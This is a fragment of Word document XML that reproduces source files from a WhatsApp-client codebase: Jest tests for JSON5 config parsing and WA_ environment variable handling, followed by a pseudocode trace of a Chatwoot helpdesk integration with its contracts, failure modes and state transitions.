      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'with-comments.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const json5Content = `{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // This is a comment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "sessionId": "json5-session",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "port": 8888,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    /* Multi-line</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       comment */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "debug": true</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json5Content);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expect(result.sessionId).toBe('json5-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(8888);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.debug).toBe(true);</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parse JSON with trailing commas', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'trailing-comma.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const json5Content = `{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "sessionId": "trailing-session",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    "port": 7777,</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fs.writeFileSync(configPath, json5Content);</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try {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { configFile } = await getIsolatedModule();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const result = await configFile(configPath);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expect(result.sessionId).toBe('trailing-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(7777);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        } finally {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            fs.unlinkSync(configPath);</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describe('Edge Cases', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    beforeEach(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        jest.resetModules();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        jest.clearAllMocks();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.env = { ...originalEnv };</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handle boolean-as-string env var "0" and "1"', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.env.WA_HEADLESS = '1';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.env.WA_DEBUG = '0';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 "1" should be treated as number 1, not boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(result.headless).toBe(1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // "0" should be treated as number 0, not boolean</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(result.debug).toBe(0);</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it('should preserve WA_ vars that are not typical config keys', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.env.WA_CUSTOM_VAR = 'custom-value';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const { envArgs } = await getIsolatedModule();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const result = envArgs();</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        expect(result.customVar).toBe('custom-value');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">});</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packages/legacy-documented/src/cli/__tests__/setup.test.ts ---</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BEGIN FILE: packages/legacy-documented/src/cli/integrations/chatwoot.pseudo.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># cli/integrations/chatwoot.ts pseudocode trace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Source of truth: `packages/legacy/src/cli/integrations/chatwoot.ts`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This file is large. This note focuses on the integration behavior exposed to the CLI/server layer.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Role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Bidirectional bridge between a live WA client and Chatwoot inbox/conversation flows.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Main exported pieces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`chatwoot.ts:25` — event name constant used for integration checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `chatwoot.ts:42-128` — `chatwootMiddleware(cliConfig, client)`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - consume Chatwoot webhook payloads</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - ignore unsupported/private/incoming cases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - map Chatwoot messages and attachments into WA sends</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - support CSAT follow-up messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - store outgoing message ids in an ignore map.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `chatwoot.ts:130-134` — `setupChatwootOutgoingMessageHandler(...)` initializes the Chatwoot client wrapper.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ChatwootClient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`chatwoot.ts:179+` — `ChatwootClient` encapsulates:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Chatwoot endpoint/account/inbox discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - webhook validation and setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - contact/conversation lookup/creation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  - outbound message sync between WA and Chatwoot.</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Why this matters for v5</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This file shows a concrete example of a nontrivial integration layered on top of the legacy client.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- It is useful as reference material for the future plugin/integration architecture even though it is optional runtime behavior.</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Behavioral contract / pseudo tests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Integration middleware should translate external-system events into WA-side actions without bypassing the core client contract.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Unsupported message types or unsupported contexts should be ignored explicitly rather than producing undefined behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Contact/conversation mapping should remain stable across repeated sync operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outbound integration sends should protect against feedback loops where the integration consumes its own emitted messages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Integration bootstrap should verify enough remote state to know whether the integration is usable.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Parity status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Dimension | Status | Note |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| --- | --- | --- |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| Bidirectional CRM/helpdesk bridge | Preserve | Good plugin/integration reference. |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">| Exact Chatwoot-specific API choreography | Intentionally changed | Specific integration can be reworked.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 outputs / side effects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Inputs: webhook payloads, client, Chatwoot config/API credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outputs: translated outbound WA actions and synced Chatwoot state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Side effects: remote API calls, local ignore/contact/conversation registry mutation.</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Failure taxonomy</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Remote API auth failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Webhook payload mismatch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Contact/conversation sync failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Outgoing message translation failure</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Dependency contracts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Requires: live client, remote Chatwoot API reachability, stable ID mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- Guarantees: integration sits on top of client/server contracts rather than bypassing them.</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State transitions</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`WEBHOOK_RECEIVED -&gt; TRANSLATED -&gt; WA_ACTION_SENT | IGNORED | INTEGRATION_ERROR`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">- `INTEGRATION_UNINITIALIZED -&gt; REMOTE_STATE_VERIFIED -&gt; INTEGRATION_READY`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">--- END FILE: packages/legacy-documented/src/cli/integrations/chatwoot.pseudo.md ---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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2026-04-11T16:50:36.766Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-11T16:50:36.766Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>